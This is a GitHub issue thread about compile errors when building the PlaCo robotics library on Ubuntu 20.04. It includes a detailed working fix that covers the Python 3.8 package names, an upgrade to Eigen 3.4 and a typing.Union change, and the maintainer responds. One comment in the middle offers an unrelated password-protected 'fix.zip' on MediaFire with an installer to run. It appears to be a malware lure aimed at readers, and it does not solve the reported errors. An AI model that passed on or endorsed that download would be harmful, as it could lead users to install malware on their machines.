### ISSUE TITLE
Compilation errors occur when building from source on Ubuntu 20.04

### ISSUE THREAD

**Issue by yanghanjiang** [Rhoban/placo#8]
I am not certain whether PlaCo 0.6.2 is fully compatible with Ubuntu 20.04. Since my OS version is Ubuntu 20.04, I attempted to install PlaCo on it but encountered several errors during the installation process, which are detailed below.

#### Error when Installing Pinocchio Dependencies
When running the installation command,
```
sudo apt-get install \
        robotpkg-py310-eigenpy=3.1.1 \
        robotpkg-hpp-fcl=2.3.6 \
        robotpkg-pinocchio=2.6.20 \
        robotpkg-py310-eigenpy=3.1.1  \
        robotpkg-py310-hpp-fcl=2.3.6 \
        robotpkg-py310-pinocchio=2.6.20 \
        robotpkg-eiquadprog
```
the following error occurred:
```
E: Unable to locate package robotpkg-py310-eigenpy
E: Unable to locate package robotpkg-py310-eigenpy
E: Unable to locate package robotpkg-py310-hpp-fcl
E: Unable to locate package robotpkg-py310-pinocchio
```
Cause: Default python version is 3.8 for ubuntu 20.04, so could not locate package robotpkg-**py310**-*
#### Error when Building PlaCo
When attempting to build PlaCo
```
cd placo
mkdir build
cd build
cmake .. -DCMAKE_BUILD_TYPE=Release
make -j 8
```
the following error occurred:
```
/ros1_ws/src/placo/src/placo/tools/axises_mask.cpp: In member function ‘Eigen::MatrixXd placo::tools::AxisesMask::apply(Eigen::MatrixXd)’:
/ros1_ws/src/placo/src/placo/tools/axises_mask.cpp:79:35: error: ‘all’ is not a member of ‘Eigen’
   79 |   return M_masked(indices, Eigen::all);
      |                                   ^~~
make[2]: *** [CMakeFiles/libplaco.dir/build.make:272: CMakeFiles/libplaco.dir/src/placo/tools/axises_mask.cpp.o] Error 1
make[2]: *** Waiting for unfinished jobs....
```
 and
```
Generating stubs...
Traceback (most recent call last):
  File "/ros1_ws/src/placo/stubs.py", line 22, in <module>
    from doxygen_parse import parse_directory, get_members, get_metadata
  File "/ros1_ws/src/placo/doxygen_parse.py", line 151, in <module>
    def resolve_doxygen_id(id: list|str):
TypeError: unsupported operand type(s) for |: 'type' and 'type'
make[2]: *** [CMakeFiles/placo.dir/build.make:279: lib/python3/dist-packages/placo.so] Error 1
make[2]: *** Deleting file 'lib/python3/dist-packages/placo.so'
make[1]: *** [CMakeFiles/Makefile2:113: CMakeFiles/placo.dir/all] Error 2
make: *** [Makefile:136: all] Error 2
```
Cause: 

- Error 1: The default eigen version available on Ubuntu 20.04 via `sudo apt-get install libeigen3-dev` is 3.3.7. However `Eigen::all` seems not a member of eigen 3.3.7 and available in eigen 3.4.0.
- Error 2: The syntax `def resolve_doxygen_id(id: list|str):` is not supported in Python 3.8 but is compatible with Python 3.10.

### Solution
Below is a complete solution for installing PlaCo on Ubuntu 20.04 from source.
#### System dependencies
```
sudo apt-get install python3-dev libpython3-dev libboost-python-dev \
         doxygen libjsoncpp-dev
```
#### Pinocchio dependencies
First, follow this [procedure](https://stack-of-tasks.github.io/pinocchio/download.html) to add the apt repositories for Pinocchio.
Then
```
sudo apt-get install \
        robotpkg-py38-eigenpy=3.1.1 \
        robotpkg-hpp-fcl=2.3.6 \
        robotpkg-pinocchio=2.6.20 \
        robotpkg-py38-eigenpy=3.1.1  \
        robotpkg-py38-hpp-fcl=2.3.6 \
        robotpkg-py38-pinocchio=2.6.20 \
        robotpkg-eiquadprog
```
Add below code to .bashrc
```
export PATH=/opt/openrobots/bin:$PATH
export PKG_CONFIG_PATH=/opt/openrobots/lib/pkgconfig:$PKG_CONFIG_PATH
export LD_LIBRARY_PATH=/opt/openrobots/lib:$LD_LIBRARY_PATH
export PYTHONPATH=/opt/openrobots/lib/python3.8/site-packages:$PYTHONPATH
export CMAKE_PREFIX_PATH=/opt/openrobots:$CMAKE_PREFIX_PATH
```
Then source .bashrc
```
source ~/.bashrc
```
#### Change eigen version
```
wget https://gitlab.com/libeigen/eigen/-/archive/3.4.0/eigen-3.4.0.tar.gz
tar -xvzf eigen-3.4.0.tar.gz
cd eigen-3.4.0
mkdir build
cd build
cmake .. -DCMAKE_INSTALL_PREFIX=/usr
make -j16
sudo make install
pkg-config --modversion eigen3
```
To resolve the eigen version issue, you may need to upgrade to eigen 3.4.0. However, this could introduce compatibility issues with other projects. Alternatively, modifying the PlaCo code to be compatible with eigen 3.3.7 could be a viable solution.
#### Modifying code for python 3.8
Change line from
https://github.com/Rhoban/placo/blob/4d8119a623ad73e4f3536b11cd72f706054810f5/doxygen_parse.py#L151
to 
```
from typing import Union
def resolve_doxygen_id(id: Union[list,str]):
```
#### Cloning and building
```
git clone https://www.github.com/rhoban/placo.git
cd placo
mkdir build
cd build
cmake .. -DCMAKE_BUILD_TYPE=Release
make -j16
```
It would be beneficial to add more detailed information about compatible operating systems and specific installation instructions for different OS versions to the PlaCo documentation.

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Gregwar** [comment]
Hello, thanks for your feedback

* I added a comment in the [doc](https://placo.readthedocs.io/en/latest/basics/installation_source.html) about the possible need to adapt python version and installing Eigen>=3.4 for older Ubuntu
* I updated `doxygen_parse.py` so that it uses `typing`'s `Union`, since it looks like compatible with 3.10 as well

Does it sounds good for you ?

**Comment by yanghanjiang** [comment]
Sounds good. Thanks.
